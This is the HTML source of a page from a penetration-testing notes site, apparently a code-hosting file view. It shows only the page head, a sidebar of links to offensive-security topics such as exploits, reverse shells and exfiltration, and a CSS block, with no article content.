334 lines
46 KiB
HTML
334 lines
46 KiB
HTML
<!doctype html>
|
|
<html lang="en">
|
|
<center>
|
|
<head>
|
|
|
|
|
|
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
|
|
<!-- mathjax -->
|
|
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
|
|
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
|
|
<script type="text/javascript" src="/static/js/search.js"></script>
|
|
<link rel="stylesheet" href="/static/stylesheet.css">
|
|
<link rel="stylesheet" href="/static/auto-complete.css">
|
|
<br>
|
|
<title>In the Open</title>
|
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
|
|
|
|
|
</head>
|
|
<body>
|
|
<!-- topmenu -->
|
|
<div class="menu">
|
|
<a href="/" style="text-decoration:none">In the Open</a>
|
|
</div>
|
|
<div class="search-container">
|
|
<label for="search-by"><i class="fas fa-search"></i></label>
|
|
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
|
|
<!--button type="submit"><i class="search"></i>🔍</button>-->
|
|
<span data-search-clear=""><i class="fas fa-times"></i></span>
|
|
</div>
|
|
|
|
</div>
|
|
<div class="menu">
|
|
</div>
|
|
<!--br><br-->
|
|
</center>
|
|
<p></p>
|
|
<div class="columns">
|
|
<!-- Sidebar -->
|
|
<div class="column column-1">
|
|
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="linkClick(this); return false;" ><summary>Canary_bypass</summary><ul><li><a href="/exploit/binaries/canary_bypass/canary_bypass.html">canary_bypass</a></li></ul></details><details id=format_string ontoggle="linkClick(this); return false;" ><summary>Format_string</summary><ul><li><a href="/exploit/binaries/format_string/format_string.html">format_string</a></li></ul></details><details id=integral_promotion ontoggle="linkClick(this); return false;" ><summary>Integral_promotion</summary><ul><li><a href="/exploit/binaries/integral_promotion/integral_promotion.html">integral_promotion</a></li></ul></details><li><a href="/exploit/binaries/plt_got.html">plt_got</a></li><li><a href="/exploit/binaries/r2.html">r2</a></li><li><a href="/exploit/binaries/ret2libc.html">ret2libc</a></li></ul></details><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exploit/dns/zone_transfer.html">zone_transfer</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><li><a href="/exploit/hashes/collision.html">collision</a></li></ul></details><details id=imagemagick ontoggle="linkClick(this); return false;" ><summary>Imagemagick</summary><ul><li><a href="/exploit/imagemagick/imagetragick.html">imagetragick</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><details id=OGNL ontoggle="linkClick(this); return false;" ><summary>OGNL</summary><ul><li><a href="/exploit/java/OGNL/cve_2022_26134.html">cve_2022_26134</a></li></ul></details><li><a href="/exploit/java/ghidra_debug.html">ghidra_debug</a></li><li><a href="/exploit/java/ghostcat.html">ghostcat</a></li><li><a href="/exploit/java/log4shell.html">log4shell</a></li><li><a href="/exploit/java/spring4shell.html">spring4shell</a></li></ul></details><details id=level3_hypervisor ontoggle="linkClick(this); return false;" ><summary>Level3_hypervisor</summary><ul><details id=docker_sec ontoggle="linkClick(this); return false;" ><summary>Docker_sec</summary><ul><li><a href="/exploit/level3_hypervisor/docker_sec/docker.html">docker</a></li></ul></details><li><a href="/exploit/level3_hypervisor/kubernetes.html">kubernetes</a></li><li><a href="/exploit/level3_hypervisor/lxc.html">lxc</a></li><li><a href="/exploit/level3_hypervisor/microk8s.html">microk8s</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exploit/linux/capabilities.html">capabilities</a></li><details id=dirty_pipe ontoggle="linkClick(this); return false;" ><summary>Dirty_pipe</summary><ul><li><a href="/exploit/linux/dirty_pipe/dirty_pipe.html">dirty_pipe</a></li></ul></details><li><a href="/exploit/linux/exiftool.html">exiftool</a></li><li><a href="/exploit/linux/groups.html">groups</a></li><li><a href="/exploit/linux/ld_preload.html">ld_preload</a></li><li><a href="/exploit/linux/nfs_rootsquash.html">nfs_rootsquash</a></li><li><a href="/exploit/linux/overlayfs.html">overlayfs</a></li><details id=pkexec ontoggle="linkClick(this); return false;" ><summary>Pkexec</summary><ul><li><a href="/exploit/linux/pkexec/CVE_2021_4034.html">CVE_2021_4034</a></li></ul></details><li><a href="/exploit/linux/polkit.html">polkit</a></li><li><a href="/exploit/linux/racing_conditions.html">racing_conditions</a></li><li><a href="/exploit/linux/setcap.html">setcap</a></li><li><a href="/exploit/linux/shared_object_injection.html">shared_object_injection</a></li><li><a href="/exploit/linux/shell_shock.html">shell_shock</a></li><details id=sudo ontoggle="linkClick(this); return false;" ><summary>Sudo</summary><ul><li><a href="/exploit/linux/sudo/CVE_2019_14287.html">CVE_2019_14287</a></li><li><a href="/exploit/linux/sudo/CVE_2019_18634.html">CVE_2019_18634</a></li><li><a href="/exploit/linux/sudo/baron_samedit.html">baron_samedit</a></li><li><a href="/exploit/linux/sudo/tokens.html">tokens</a></li></ul></details><li><a href="/exploit/linux/wildard_exploitation.html">wildard_exploitation</a></li></ul></details><details id=macOS ontoggle="linkClick(this); return false;" ><summary>MacOS</summary><ul></ul></details><details id=network ontoggle="linkClick(this); return false;" ><summary>Network</summary><ul><li><a href="/exploit/network/mac_spoofing.html">mac_spoofing</a></li></ul></details><details id=padding ontoggle="linkClick(this); return false;" ><summary>Padding</summary><ul><li><a href="/exploit/padding/padbuster.html">padbuster</a></li></ul></details><details id=python ontoggle="linkClick(this); return false;" ><summary>Python</summary><ul><li><a href="/exploit/python/code_injection.html">code_injection</a></li><li><a href="/exploit/python/jail_escape.html">jail_escape</a></li><li><a href="/exploit/python/lib_hijack.html">lib_hijack</a></li><li><a href="/exploit/python/pickle.html">pickle</a></li><li><a href="/exploit/python/pwntools.html">pwntools</a></li><li><a href="/exploit/python/pyc.html">pyc</a></li><li><a href="/exploit/python/scapy.html">scapy</a></li></ul></details><details id=samba ontoggle="linkClick(this); return false;" ><summary>Samba</summary><ul><li><a href="/exploit/samba/smbmap.html">smbmap</a></li></ul></details><details id=sqli ontoggle="linkClick(this); return false;" ><summary>Sqli</summary><ul><li><a href="/exploit/sqli/mssql.html">mssql</a></li><li><a href="/exploit/sqli/no_sqli.html">no_sqli</a></li><li><a href="/exploit/sqli/sqli.html">sqli</a></li><li><a href="/exploit/sqli/sqlmap.html">sqlmap</a></li></ul></details><details id=ssl_tls ontoggle="linkClick(this); return false;" ><summary>Ssl_tls</summary><ul><li><a href="/exploit/ssl_tls/heartbleed.html">heartbleed</a></li></ul></details><details id=web ontoggle="linkClick(this); return false;" ><summary>Web</summary><ul><details id=bypass_rate_limiting ontoggle="linkClick(this); return false;" ><summary>Bypass_rate_limiting</summary><ul><li><a href="/exploit/web/bypass_rate_limiting/bypass_rate_limiting.html">bypass_rate_limiting</a></li></ul></details><li><a href="/exploit/web/command_injection.html">command_injection</a></li><details id=content_security_policy ontoggle="linkClick(this); return false;" ><summary>Content_security_policy</summary><ul><li><a href="/exploit/web/content_security_policy/content_security_policy.html">content_security_policy</a></li></ul></details><li><a href="/exploit/web/cookie_tampering.html">cookie_tampering</a></li><li><a href="/exploit/web/csrf.html">csrf</a></li><details id=forced_browsing ontoggle="linkClick(this); return false;" ><summary>Forced_browsing</summary><ul><li><a href="/exploit/web/forced_browsing/forced_browsing.html">forced_browsing</a></li></ul></details><li><a href="/exploit/web/http_header_injection.html">http_header_injection</a></li><details id=idor ontoggle="linkClick(this); return false;" ><summary>Idor</summary><ul><li><a href="/exploit/web/idor/idor.html">idor</a></li></ul></details><details id=javascript ontoggle="linkClick(this); return false;" ><summary>Javascript</summary><ul><li><a href="/exploit/web/javascript/bypass_filters.html">bypass_filters</a></li><li><a href="/exploit/web/javascript/prototype_pollution.html">prototype_pollution</a></li></ul></details><details id=jwt ontoggle="linkClick(this); return false;" ><summary>Jwt</summary><ul><li><a href="/exploit/web/jwt/jwt.html">jwt</a></li></ul></details><li><a href="/exploit/web/local_file_inclusion.html">local_file_inclusion</a></li><li><a href="/exploit/web/methodology.html">methodology</a></li><details id=nodejs ontoggle="linkClick(this); return false;" ><summary>Nodejs</summary><ul><li><a href="/exploit/web/nodejs/deserialization.html">deserialization</a></li></ul></details><details id=php ontoggle="linkClick(this); return false;" ><summary>Php</summary><ul><li><a href="/exploit/web/php/command_injection.html">command_injection</a></li><li><a href="/exploit/web/php/password_reset.html">password_reset</a></li><li><a href="/exploit/web/php/php_base64_filter.html">php_base64_filter</a></li><li><a href="/exploit/web/php/php_image_exif.html">php_image_exif</a></li><li><a href="/exploit/web/php/php_user_agent_rce.html">php_user_agent_rce</a></li><li><a href="/exploit/web/php/preload_lib.html">preload_lib</a></li><li><a href="/exploit/web/php/unserialize.html">unserialize</a></li></ul></details><li><a href="/exploit/web/re_registration.html">re_registration</a></li><li><a href="/exploit/web/remote_file_inclusion.html">remote_file_inclusion</a></li><details id=ssrf ontoggle="linkClick(this); return false;" ><summary>Ssrf</summary><ul><li><a href="/exploit/web/ssrf/iframe.html">iframe</a></li><li><a href="/exploit/web/ssrf/ssrf.html">ssrf</a></li></ul></details><details id=ssti ontoggle="linkClick(this); return false;" ><summary>Ssti</summary><ul><li><a href="/exploit/web/ssti/ssti.html">ssti</a></li></ul></details><li><a href="/exploit/web/url_forgery.html">url_forgery</a></li><li><a href="/exploit/web/wordpress.html">wordpress</a></li><li><a href="/exploit/web/xpath.html">xpath</a></li><li><a href="/exploit/web/xss.html">xss</a></li><details id=xxe ontoggle="linkClick(this); return false;" ><summary>Xxe</summary><ul><li><a href="/exploit/web/xxe/wp_xxe_.html">wp_xxe_</a></li><li><a href="/exploit/web/xxe/xml_external_entity.html">xml_external_entity</a></li></ul></details></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=dll_hijacking ontoggle="linkClick(this); return false;" ><summary>Dll_hijacking</summary><ul><li><a href="/exploit/windows/dll_hijacking/dll_hijacking.html">dll_hijacking</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/windows/docs/always_installed_elevated.html">always_installed_elevated</a></li><li><a href="/exploit/windows/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/exploit/windows/docs/dpapi.html">dpapi</a></li><li><a href="/exploit/windows/docs/impacket.html">impacket</a></li><li><a href="/exploit/windows/docs/llmnr.html">llmnr</a></li><li><a href="/exploit/windows/docs/lnk_exploit.html">lnk_exploit</a></li><li><a href="/exploit/windows/docs/pass_the_hash.html">pass_the_hash</a></li><li><a href="/exploit/windows/docs/password_in_registry.html">password_in_registry</a></li><li><a href="/exploit/windows/docs/potatoes.html">potatoes</a></li><li><a href="/exploit/windows/docs/printnightmare.html">printnightmare</a></li><li><a href="/exploit/windows/docs/responder.html">responder</a></li><li><a href="/exploit/windows/docs/unquoted_path.html">unquoted_path</a></li></ul></details><details id=macros ontoggle="linkClick(this); return false;" ><summary>Macros</summary><ul><li><a href="/exploit/windows/macros/macros.html">macros</a></li></ul></details><details id=payloads ontoggle="linkClick(this); return false;" ><summary>Payloads</summary><ul><li><a href="/exploit/windows/payloads/windows_scripting_host.html">windows_scripting_host</a></li></ul></details><details id=print_nightmare ontoggle="linkClick(this); return false;" ><summary>Print_nightmare</summary><ul><details id=CVE-2021-1675 ontoggle="linkClick(this); return false;" ><summary>CVE-2021-1675</summary><ul><details id=nightmare-dll ontoggle="linkClick(this); return false;" ><summary>Nightmare-dll</summary><ul></ul></details></ul></details><li><a href="/exploit/windows/print_nightmare/print_nightmare.html">print_nightmare</a></li></ul></details><details id=process_injection ontoggle="linkClick(this); return false;" ><summary>Process_injection</summary><ul><li><a href="/exploit/windows/process_injection/dll_injection.html">dll_injection</a></li><li><a href="/exploit/windows/process_injection/process_hollowing.html">process_hollowing</a></li><li><a href="/exploit/windows/process_injection/shellcode_injection.html">shellcode_injection</a></li><li><a href="/exploit/windows/process_injection/thread_hijacking.html">thread_hijacking</a></li></ul></details><details id=service_escalation ontoggle="linkClick(this); return false;" ><summary>Service_escalation</summary><ul><li><a href="/exploit/windows/service_escalation/service_escalation.html">service_escalation</a></li></ul></details><details id=zero_logon ontoggle="linkClick(this); return false;" ><summary>Zero_logon</summary><ul><li><a href="/exploit/windows/zero_logon/zero_logon.html">zero_logon</a></li></ul></details></ul></details><details id=yaml ontoggle="linkClick(this); return false;" ><summary>Yaml</summary><ul><li><a href="/exploit/yaml/deserialization.html">deserialization</a></li></ul></details></ul></details><details id=forensics ontoggle="linkClick(this); return false;" ><summary>Forensics</summary><ul><li><a href="/forensics/ios.html">ios</a></li><li><a href="/forensics/kape.html">kape</a></li><li><a href="/forensics/ntfs.html">ntfs</a></li><li><a href="/forensics/oletools.html">oletools</a></li><li><a href="/forensics/volatility.html">volatility</a></li><li><a href="/forensics/windows_registry.html">windows_registry</a></li></ul></details><details id=hashes ontoggle="linkClick(this); return false;" ><summary>Hashes</summary><ul><details id=bruteforce ontoggle="linkClick(this); return false;" ><summary>Bruteforce</summary><ul></ul></details><li><a href="/hashes/generate_wordlists.html">generate_wordlists</a></li><li><a href="/hashes/haiti.html">haiti</a></li><li><a href="/hashes/hashcat_utils.html">hashcat_utils</a></li><details id=password_cracking ontoggle="linkClick(this); return false;" ><summary>Password_cracking</summary><ul><li><a href="/hashes/password_cracking/hydra.html">hydra</a></li><li><a href="/hashes/password_cracking/john.html">john</a></li><li><a href="/hashes/password_cracking/smb_challenge.html">smb_challenge</a></li><li><a href="/hashes/password_cracking/sucrack.html">sucrack</a></li><li><a href="/hashes/password_cracking/vnc.html">vnc</a></li></ul></details><details id=password_guessing ontoggle="linkClick(this); return false;" ><summary>Password_guessing</summary><ul><li><a href="/hashes/password_guessing/standard_passwords.html">standard_passwords</a></li></ul></details></ul></details><details id=misc ontoggle="linkClick(this); return false;" ><summary>Misc</summary><ul><details id=active_directory ontoggle="linkClick(this); return false;" ><summary>Active_directory</summary><ul><li><a href="/misc/active_directory/AD_CS.html">AD_CS</a></li><li><a href="/misc/active_directory/active_directory.html">active_directory</a></li><li><a href="/misc/active_directory/ad_enumeration.html">ad_enumeration</a></li><li><a href="/misc/active_directory/ad_misconfiguration.html">ad_misconfiguration</a></li><li><a href="/misc/active_directory/ad_persistence.html">ad_persistence</a></li><li><a href="/misc/active_directory/gaining_foothold_AD.html">gaining_foothold_AD</a></li><li><a href="/misc/active_directory/lateral_movement.html">lateral_movement</a></li></ul></details><li><a href="/misc/bash.html">bash</a></li><li><a href="/misc/clamav.html">clamav</a></li><li><a href="/misc/gitTools.html">gitTools</a></li><li><a href="/misc/hadoop.html">hadoop</a></li><li><a href="/misc/metasploit.html">metasploit</a></li><details id=printer_hacking ontoggle="linkClick(this); return false;" ><summary>Printer_hacking</summary><ul><li><a href="/misc/printer_hacking/preta.html">preta</a></li></ul></details><li><a href="/misc/responder.html">responder</a></li><li><a href="/misc/sandbox_evasion.html">sandbox_evasion</a></li><li><a href="/misc/smtp.html">smtp</a></li><li><a href="/misc/snort.html">snort</a></li><details id=telecommunications ontoggle="linkClick(this); return false;" ><summary>Telecommunications</summary><ul><details id=_sipvicious ontoggle="linkClick(this); return false;" ><summary>_sipvicious</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/bug-report.html">bug-report</a></li><li><a href="/misc/telecommunications/_sipvicious/.github/ISSUE_TEMPLATE/custom.html">custom</a></li></ul></details></ul></details><details id=sipvicious ontoggle="linkClick(this); return false;" ><summary>Sipvicious</summary><ul></ul></details></ul></details><li><a href="/misc/telecommunications/sip_vicious.html">sip_vicious</a></li></ul></details><details id=threat_intelligence ontoggle="linkClick(this); return false;" ><summary>Threat_intelligence</summary><ul><li><a href="/misc/threat_intelligence/isac.html">isac</a></li><li><a href="/misc/threat_intelligence/loki.html">loki</a></li><li><a href="/misc/threat_intelligence/osquery.html">osquery</a></li><li><a href="/misc/threat_intelligence/pithus.html">pithus</a></li><li><a href="/misc/threat_intelligence/siem.html">siem</a></li><li><a href="/misc/threat_intelligence/splunk.html">splunk</a></li><li><a href="/misc/threat_intelligence/yara.html">yara</a></li></ul></details><details id=wifi ontoggle="linkClick(this); return false;" ><summary>Wifi</summary><ul><li><a href="/misc/wifi/airmon-ng.html">airmon-ng</a></li></ul></details></ul></details><details id=osint ontoggle="linkClick(this); return false;" ><summary>Osint</summary><ul><li><a href="/osint/recon_ng.html">recon_ng</a></li><details id=social_engineering ontoggle="linkClick(this); return false;" ><summary>Social_engineering</summary><ul><li><a href="/osint/social_engineering/gophish.html">gophish</a></li><li><a href="/osint/social_engineering/phishing_domain.html">phishing_domain</a></li></ul></details><li><a href="/osint/spiderfoot.html">spiderfoot</a></li><li><a href="/osint/theharvester.html">theharvester</a></li></ul></details><details id=persistence ontoggle="linkClick(this); return false;" ><summary>Persistence</summary><ul><li><a href="/persistence/bashrc.html">bashrc</a></li><li><a href="/persistence/crontab.html">crontab</a></li><li><a href="/persistence/meterpreter.html">meterpreter</a></li><li><a href="/persistence/persistence.html">persistence</a></li><li><a href="/persistence/wmi.html">wmi</a></li></ul></details><details id=post exploitation ontoggle="linkClick(this); return false;" ><summary>Post exploitation</summary><ul><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=.github ontoggle="linkClick(this); return false;" ><summary>.github</summary><ul><details id=ISSUE_TEMPLATE ontoggle="linkClick(this); return false;" ><summary>ISSUE_TEMPLATE</summary><ul><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/bug_report.html">bug_report</a></li><li><a href="/post exploitation/Seatbelt/.github/ISSUE_TEMPLATE/feature_request.html">feature_request</a></li></ul></details></ul></details><li><a href="/post exploitation/Seatbelt/CHANGELOG.html">CHANGELOG</a></li><details id=Seatbelt ontoggle="linkClick(this); return false;" ><summary>Seatbelt</summary><ul><details id=Commands ontoggle="linkClick(this); return false;" ><summary>Commands</summary><ul><details id=Windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><details id=EventLogs ontoggle="linkClick(this); return false;" ><summary>EventLogs</summary><ul></ul></details></ul></details></ul></details><details id=Output ontoggle="linkClick(this); return false;" ><summary>Output</summary><ul></ul></details></ul></details></ul></details><details id=bc_security ontoggle="linkClick(this); return false;" ><summary>Bc_security</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/docs/c2.html">c2</a></li><li><a href="/post exploitation/docs/crackmapexec.html">crackmapexec</a></li><li><a href="/post exploitation/docs/empire.html">empire</a></li><li><a href="/post exploitation/docs/ids_ips_evation.html">ids_ips_evation</a></li><li><a href="/post exploitation/docs/linux.html">linux</a></li><li><a href="/post exploitation/docs/metasploit.html">metasploit</a></li><li><a href="/post exploitation/docs/mimikatz.html">mimikatz</a></li><li><a href="/post exploitation/docs/mitm.html">mitm</a></li><li><a href="/post exploitation/docs/nfs_root_squash.html">nfs_root_squash</a></li><li><a href="/post exploitation/docs/powershell.html">powershell</a></li><li><a href="/post exploitation/docs/secretsdump.html">secretsdump</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/docs/windows/antivirus_evasion.html">antivirus_evasion</a></li><li><a href="/post exploitation/docs/windows/applocker.html">applocker</a></li><li><a href="/post exploitation/docs/windows/evade_event_tracing.html">evade_event_tracing</a></li><li><a href="/post exploitation/docs/windows/living_off_the_land.html">living_off_the_land</a></li><li><a href="/post exploitation/docs/windows/pass_the_hash.html">pass_the_hash</a></li><li><a href="/post exploitation/docs/windows/powershell_logs.html">powershell_logs</a></li><li><a href="/post exploitation/docs/windows/registry.html">registry</a></li><li><a href="/post exploitation/docs/windows/sebackupprivilege.html">sebackupprivilege</a></li><li><a href="/post exploitation/docs/windows/user_account_control.html">user_account_control</a></li></ul></details></ul></details><li><a href="/post exploitation/pivoting.html">pivoting</a></li><details id=priv_esc ontoggle="linkClick(this); return false;" ><summary>Priv_esc</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/docs/linux_priv_esc.html">linux_priv_esc</a></li><li><a href="/post exploitation/priv_esc/docs/pspy.html">pspy</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/post exploitation/priv_esc/docs/windows/add_user.html">add_user</a></li><li><a href="/post exploitation/priv_esc/docs/windows/windows_priv_esc.html">windows_priv_esc</a></li></ul></details></ul></details><details id=kernel-exploits ontoggle="linkClick(this); return false;" ><summary>Kernel-exploits</summary><ul></ul></details><details id=privesc-scripts ontoggle="linkClick(this); return false;" ><summary>Privesc-scripts</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/post exploitation/priv_esc/privesc-scripts/docs/get_script_onto_target.html">get_script_onto_target</a></li></ul></details></ul></details><details id=suid ontoggle="linkClick(this); return false;" ><summary>Suid</summary><ul></ul></details></ul></details></ul></details><details id=reverse engineering ontoggle="linkClick(this); return false;" ><summary>Reverse engineering</summary><ul><details id=android ontoggle="linkClick(this); return false;" ><summary>Android</summary><ul><li><a href="/reverse engineering/android/misc.html">misc</a></li></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse engineering/docs/deobfuscation.html">deobfuscation</a></li><li><a href="/reverse engineering/docs/dll_reversing.html">dll_reversing</a></li><li><a href="/reverse engineering/docs/firmware.html">firmware</a></li><li><a href="/reverse engineering/docs/function_mangling.html">function_mangling</a></li><li><a href="/reverse engineering/docs/scada.html">scada</a></li></ul></details><details id=java ontoggle="linkClick(this); return false;" ><summary>Java</summary><ul><li><a href="/reverse engineering/java/krakatau.html">krakatau</a></li></ul></details></ul></details><details id=reverse shells ontoggle="linkClick(this); return false;" ><summary>Reverse shells</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/reverse shells/docs/evil-winrm.html">evil-winrm</a></li><li><a href="/reverse shells/docs/msfconsole.html">msfconsole</a></li><li><a href="/reverse shells/docs/msfvenom.html">msfvenom</a></li><li><a href="/reverse shells/docs/netcat.html">netcat</a></li><li><a href="/reverse shells/docs/powershell.html">powershell</a></li><li><a href="/reverse shells/docs/shell_upgrade.html">shell_upgrade</a></li><li><a href="/reverse shells/docs/socat.html">socat</a></li><li><a href="/reverse shells/docs/webshell.html">webshell</a></li></ul></details><li><a href="/reverse shells/firewalls.html">firewalls</a></li><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul></ul></details></ul></details><details id=stego ontoggle="linkClick(this); return false;" ><summary>Stego</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/stego/docs/outguess.html">outguess</a></li><li><a href="/stego/docs/remnux.html">remnux</a></li><li><a href="/stego/docs/stegbrute.html">stegbrute</a></li><li><a href="/stego/docs/steghide.html">steghide</a></li><li><a href="/stego/docs/stegoveritas.html">stegoveritas</a></li><li><a href="/stego/docs/zsteg.html">zsteg</a></li></ul></details></ul></details>
|
|
</ul>
|
|
</div>
|
|
<div class="column column-2">
|
|
<span class="body">
|
|
<style>pre { line-height: 125%; }
|
|
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
|
|
.codehilite .hll { background-color: #2C3B41 }
|
|
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
|
|
.codehilite .err { color: #FF5370 } /* Error */
|
|
.codehilite .esc { color: #89DDFF } /* Escape */
|
|
.codehilite .g { color: #EEFFFF } /* Generic */
|
|
.codehilite .k { color: #BB80B3 } /* Keyword */
|
|
.codehilite .l { color: #C3E88D } /* Literal */
|
|
.codehilite .n { color: #EEFFFF } /* Name */
|
|
.codehilite .o { color: #89DDFF } /* Operator */
|
|
.codehilite .p { color: #89DDFF } /* Punctuation */
|
|
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
|
|
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
|
|
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
|
|
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
|
|
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
|
|
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
|
|
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
|
|
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
|
|
.codehilite .gr { color: #FF5370 } /* Generic.Error */
|
